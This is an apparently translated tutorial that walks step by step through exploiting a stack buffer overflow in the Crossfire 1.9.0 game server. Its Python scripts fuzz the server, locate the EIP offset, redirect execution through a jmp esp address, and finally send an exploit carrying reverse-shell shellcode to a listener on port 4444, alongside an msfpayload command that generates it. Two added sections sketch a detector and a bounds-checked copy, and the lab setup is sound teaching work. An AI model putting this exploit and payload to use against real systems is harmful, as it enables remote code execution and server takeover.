What is a buffer overflow?
Anyone who has studied assembly will know that when a buffer's bounds are not strictly checked, malformed data passed into a variable (or a program error) can make the buffer "burst", overwriting the data in the adjacent memory area.
Successfully modifying memory data can result in the process being hijacked, malicious code being executed, control of the server being gained, and so on.
Crossfire
- Multiplayer online RPG game
- Version 1.9.0 has a buffer overflow vulnerability when the server accepts inbound socket connections (server side)
Debugging Tools
Operating Platform
- Kali 2.0 x64 virtual machine
Memory protection mechanisms in Linux
- DEP
- ASLR
- Stack cookies
- Stack smash
Because the vulnerability is old, to avoid our VM being hijacked during testing you can use iptables to restrict the destination port so that only local access is allowed (this can be omitted if the VM network is host-only):
iptables -A INPUT -p tcp --dport 13327 ! -s 127.0.0.1 -j DROP
Create the /usr/games/ directory and extract the crossfire 1.9.0 server into it:
# extract
mkdir /usr/games/
cd /usr/games/
tar zxpf crossfire.tar.gz
Run crossfire to check that it starts: ./crossfire
If "Waiting for connections" appears it is working; otherwise look at the error message.
Then start it under EDB: edb --run /usr/games/crossfire/bin/crossfire
The lower right corner shows the program in the paused state.
In the menu bar choose Debug → Run (F9); after clicking twice the program is running.
You can view the program's listening port with the command
netstat -pantu | grep 13327
The address of the next instruction to execute is stored in EIP.
This program differs from a typical overflow: it only overflows when a fixed amount of data is sent, not when any amount above a certain size is sent. We construct the following Python program to test this:
#!/usr/bin/python
import socket

host = "127.0.0.1"
crash = "\x41" * 4379  # \x41 is the hex code for uppercase 'A'
# \x90 is the NOP opcode, \x00 is a null byte
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] Payload sent!"
After running it, EDB reports the following error:
This means that EIP (the register holding the address of the next instruction) has been overwritten with the address shown in bold, and the CPU cannot find that address. The address is the data we sent, which shows that EIP is controllable and that there is an overflow.
You can also test by adding or removing one 'A' from the send: you will find that the overwritten value is then no longer made up of our 'A's and is not controllable. That is, EIP is fully controllable only when exactly 4379 bytes are sent.
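As an added example (not code from the original write-up), a server- or sensor-side check that flags the oversized setup command used above. It assumes the client message carries "setup <option> <value>" somewhere after a short header and that legitimate values are short printable tokens; the 64-byte limit and the sample messages are constructed for this example.

```python
# Constructed limit: real option values such as "1" or "0" are only a few bytes long.
MAX_SETUP_VALUE = 64
# Filler runs this long are typical of overflow probes like "A" * 4379.
MIN_FILLER_RUN = 32


def split_setup(msg):
    """Return (option, value) from a 'setup <option> <value>' command, or None."""
    idx = msg.find(b"setup ")
    if idx < 0:
        return None
    rest = msg[idx + len(b"setup "):]
    option, _, value = rest.partition(b" ")
    return option, value


def longest_run(data):
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_message(msg):
    """Classify one client message; 'reasons' lists why it looks like an overflow attempt."""
    parsed = split_setup(msg)
    if parsed is None:
        return {"command": "other", "suspicious": False, "reasons": []}
    option, value = parsed
    reasons = []
    if len(value) > MAX_SETUP_VALUE:
        reasons.append("value is %d bytes, limit %d" % (len(value), MAX_SETUP_VALUE))
    nonprint = sum(1 for b in value if b < 0x20 or b > 0x7e)
    if nonprint:
        reasons.append("%d non-printable byte(s) in value" % nonprint)
    run = longest_run(value)
    if run >= MIN_FILLER_RUN:
        reasons.append("filler run of %d identical bytes" % run)
    return {"command": "setup", "option": option.decode("ascii", "replace"),
            "value_len": len(value), "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples: a normal client setting and the crash message from the write-up.
BENIGN = b"setup sound 1"
CRASH = b"\x11(setup sound " + b"\x41" * 4379 + b"\x90\x00#"

if __name__ == "__main__":
    for m in (BENIGN, CRASH):
        print(inspect_message(m))
```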
To see exactly which of the A's end up in EIP after the overflow, use the Metasploit tool that generates a unique (non-repeating) string:
cd /usr/share/metasploit-framework/tools/exploit/ and run the pattern-creation script with a length of 4379
Copy the string and construct the following Python script:
#!/usr/bin/python
import socket

host = "127.0.0.1"
crash = "<unique string>"  # paste the generated pattern here
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] Payload sent!"
Open the EDB launcher and run the Python program.
Use the tool to confirm the position of the value that landed in EIP:
cd /usr/share/metasploit-framework/tools/exploit/ and run the pattern-offset script with the EIP value 46367046
This means that there are 4,368 characters in front of the EIP address: positions 4369, 4370, 4371 and 4372 of the data land in EIP after the overflow.
We construct the following Python script to validate this:
#!/usr/bin/python
import socket

host = "127.0.0.1"
crash = 'A' * 4368 + 'B' * 4 + 'C' * 7  # 4,379 characters in total
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] Payload sent!"
You can see that EIP is filled with exactly the B characters.
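As an added example that is not part of the original write-up, a byte-level model of the frame using the write-up's own numbers: a 4368-byte buffer directly followed by the 4-byte saved return address. The layout and the placeholder return address are assumptions, not the crossfire binary's real frame; the model also shows the bounded copy that would have kept the saved return address intact.

```python
BUF_SIZE = 4368          # bytes that sit in front of the saved return address, per the write-up
RET_SIZE = 4             # size of the saved return address (EIP slot) on 32-bit x86
ORIG_RET = 0x0804ABCD    # constructed placeholder for the legitimate return address


class ToyFrame:
    """Local buffer, saved return address, then a little memory beyond it (the ESP side)."""

    def __init__(self, beyond_size=16):
        self.buf = bytearray(BUF_SIZE)
        self.ret = bytearray(ORIG_RET.to_bytes(RET_SIZE, "little"))
        self.beyond = bytearray(beyond_size)

    def unchecked_copy(self, data):
        """Models a copy with no bounds check: the bytes run straight past the buffer."""
        mem = self.buf + self.ret + self.beyond
        if len(data) > len(mem):
            raise MemoryError("write runs off the modelled frame")
        mem[:len(data)] = data                       # out-of-bounds write in the C original
        self.buf = mem[:BUF_SIZE]
        self.ret = mem[BUF_SIZE:BUF_SIZE + RET_SIZE]  # bytes 4369..4372 become the new EIP
        self.beyond = mem[BUF_SIZE + RET_SIZE:]       # anything after that is what ESP points at

    def checked_copy(self, data):
        """The fix: refuse any input that does not fit the buffer."""
        if len(data) > BUF_SIZE:
            raise ValueError("input of %d bytes exceeds %d-byte buffer" % (len(data), BUF_SIZE))
        self.buf[:len(data)] = data

    def saved_eip(self):
        return int.from_bytes(self.ret, "little")


def demo_overflow(payload):
    """Return (saved EIP after the unchecked copy, bytes that spilled past it)."""
    f = ToyFrame()
    f.unchecked_copy(payload)
    return f.saved_eip(), bytes(f.beyond.rstrip(b"\x00"))


def demo_checked(payload):
    """True if the bounded copy rejected the payload and the saved EIP is untouched."""
    f = ToyFrame()
    try:
        f.checked_copy(payload)
        return False
    except ValueError:
        return f.saved_eip() == ORIG_RET


if __name__ == "__main__":
    eip, spilled = demo_overflow(b"A" * 4368 + b"B" * 4 + b"C" * 7)
    print("saved EIP after overflow: 0x%08x, spilled past it: %r" % (eip, spilled))
```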
Right-click ESP and select Follow in Dump to view the data.
Because an exact number of bytes is required for the overflow, ESP points to only 7 bytes, which obviously cannot hold shellcode.
After inspecting a few registers, EAX is chosen: EAX points to the thousands of A's we sent earlier, which we control and which are large enough to hold shellcode.
The first idea is to put the address of EAX into EIP, add 12 to it, and start executing directly from the position of the first A. But the EAX address differs on every machine, so a direct jump is not portable and this idea is abandoned.
Since ESP can hold 7 bytes, we instead think of a jump to EAX with an offset of 12 (add eax,12 ; jmp eax).
Construct the following Python code and run it:
#!/usr/bin/python
import socket

host = "127.0.0.1"
# 4368 bytes of filler, four B's into EIP, then "add eax,12 ; jmp eax" plus two NOPs at ESP
crash = 'A' * 4368 + 'B' * 4 + '\x83\xc0\x0c\xff\xe0\x90\x90'
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] Payload sent!"
First, EIP is still exactly the four B's.
ESP → Follow in Dump to view the data
The dump shows C0 0C FF E0 90 90, so the stub was also written here intact.
The plan is EIP → ESP → EAX: EIP transfers control to the stub at ESP, the stub jumps to EAX, and EAX holds the shellcode. Because the ESP address itself is not fixed, a fixed address is needed to make the jump.
Open EDB, menu bar Plugins → OpcodeSearcher → OpcodeSearch.
Choose the crossfire program, ESP → EIP, and pick the address of a jmp esp; this address does not change.
Menu bar Plugins → BreakpointManager → Breakpoints, select Add, and add a breakpoint at the address chosen above to test it.
Then we test for bad characters; after testing, the bad characters are \x00 \x0a \x0d \x20.
Generate the shellcode and filter out the bad characters:
cd /usr/share/framework2/
./msfpayload -L  # lists the kinds of shellcode that can be generated
./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 "\x00\x0a\x0d\x20"
Build the Python script:
#!/usr/bin/python
import socket

host = "127.0.0.1"
# 105-byte reverse shell generated above (bad characters \x00\x0a\x0d\x20 excluded)
shellcode = ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"
             "\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"
             "\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"
             "\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"
             "\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"
             "\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"
             "\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"
             "\x1a\x99\x43\x71\x97\x54\x03")
# shellcode at the start of the buffer (where EAX points), filler up to 4368 bytes,
# the jmp esp address found with OpcodeSearcher into EIP, then "add eax,12 ; jmp eax" at ESP
crash = shellcode + "A" * (4368 - 105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
buffer = "\x11(setup sound " + crash + "\x90\x90#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending evil buffer..."
s.connect((host, 13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*] Payload sent!"
Listen on local port 4444 to receive the shell.
Simple buffer overflow under Linux